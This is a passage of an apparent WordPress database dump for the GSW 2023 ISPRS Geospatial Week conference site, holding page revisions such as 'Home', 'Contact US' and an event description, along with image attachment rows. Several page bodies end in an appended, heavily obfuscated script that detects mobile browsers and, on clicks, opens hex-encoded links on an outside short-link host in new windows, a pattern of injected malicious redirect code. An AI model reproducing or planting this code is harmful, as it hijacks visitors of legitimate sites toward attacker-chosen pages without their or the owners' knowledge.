Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-09 00:00:53','2022-10-09 00:00:53','',2167,'https://gsw2023.com/?p=2625',0,'revision','',0),
(2626,1,'2022-10-09 00:12:46','2022-10-09 00:12:46','','mlogo-82','','inherit','open','closed','','mlogo-82','','','2022-10-09 00:12:46','2022-10-09 00:12:46','',0,'https://gsw2023.com/wp-content/uploads/2022/10/mlogo-82.jpg',0,'attachment','image/jpeg',0),
(2627,1,'2022-10-09 00:13:03','2022-10-09 00:13:03','','mlogo-82','','inherit','open','closed','','mlogo-82-2','','','2022-10-09 00:13:03','2022-10-09 00:13:03','',0,'https://gsw2023.com/wp-content/uploads/2022/10/mlogo-82-1.jpg',0,'attachment','image/jpeg',0),
(2628,1,'2022-10-09 00:13:22','2022-10-09 00:13:22','','mlogo-82','','inherit','open','closed','','mlogo-82-3','','','2022-10-09 00:13:22','2022-10-09 00:13:22','',0,'https://gsw2023.com/wp-content/uploads/2022/10/mlogo-82-2.jpg',0,'attachment','image/jpeg',0),
(2629,1,'2022-10-09 00:28:50','2022-10-09 00:28:50','<p>[vc_row equal_height=\"yes\" content_placement=\"top\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529513148816{padding-top: 70px !important;padding-bottom: 30px !important;}\"][vc_column offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Get In Touch!\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][/vc_column][vc_column][vc_row_inner equal_height=\"yes\" content_placement=\"top\"][vc_column_inner width=\"1/2\" css=\".vc_custom_1491746397816{padding-bottom: 50px !important;}\"][dt_fancy_image image_id=\"2364\" onclick=\"custom_link\" image_link=\"https://www.google.com/maps/@30.043056,31.232,16z?hl=en\" custom_link_target=\"_blank\" width=\"600\" css=\".vc_custom_1665134722899{padding-bottom: 30px !important;}\"][vc_column_text css=\".vc_custom_1665135195655{padding-bottom: 20px !important;}\"]</p>\n<p style=\"text-align: center;\"><strong>Arab Academy for Science, Technology and Maritime Transport</strong><br />\nWe\'d love to hear from you and this is how you can reach us...[/vc_column_text][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"color: #333333;\"><strong>MAIL</strong></span><br />\ninfo@gsw2023.com[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\" css=\".vc_custom_1491746388981{padding-bottom: 50px !important;}\"][dt_contact_form fields=\"name,email,telephone,country,message\" message_height=\"9\" required=\"name,email,telephone,country,message\" terms=\"y\" terms_msg=\"QnklMjB1c2luZyUyMHRoaXMlMjBmb3JtJTIweW91JTIwYWdyZWUlMjB3aXRoJTIwdGhlJTIwc3RvcmFnZSUyMGFuZCUyMGhhbmRsaW5nJTIwb2YlMjB5b3VyJTIwZGF0YSUyMGJ5JTIwdGhpcyUyMHdlYnNpdGUu\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Contact US','','inherit','closed','closed','','53-revision-v1','','','2022-10-09 00:28:50','2022-10-09 00:28:50','',53,'https://gsw2023.com/?p=2629',0,'revision','',0),
(2631,1,'2022-10-09 00:38:29','2022-10-09 00:38:29','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 14pt; font-family: normal Arial, Helvetica, sans-serif;\">Science, Technology and Maritime Transport acting as local organiser and host The ISPRS Geospatial Week (GSW) is a combination of workshops organised by about 30 ISPRS Working Groups active in areas of interest of ISPRS. It is convened by the Arab Academy for, and led by Prof. Naser El-Sheimy as GSW Director.</span></p>\n<p style=\"text-align: justify; color: black;\"><span style=\"font-size: 14pt; font-family: montssrat, Helvetica, sans-serif;\">The ISPRS Geospatial Week is held biennially in odd years. The GSW 2023 is the fifth edition, after Antalya 2013, Montpellier 2015, Wuhan 2017, and Enschede 2019.</span></p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 14pt; font-family: Arial, Helvetica, sans-serif;\"><strong>The ISPRS Geospatial Week\'s general goals are to:</strong></span></p>\n<ul class=\"nospace\">\n<li>\n<p style=\"text-align: justify; color: black;\"><span style=\"font-size: 14pt;\">Increase the possibility of communication between the different workshop communities within ISPRS and beyond;</span></p>\n</li>\n<li>\n<p style=\"text-align: justify; color: black;\"><span style=\"font-size: 14pt;\">Increase the continuous visibility of ISPRS on a yearly basis, together with the Congress and the Commission Symposia, thus leading to larger impact for ISPRS activities;</span></p>\n</li>\n<li>\n<p style=\"text-align: justify; color: black;\"><span style=\"font-size: 14pt;\">Gives Sustaining Members a more attractive opportunity to participate in ISPRS events.</span></p>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new 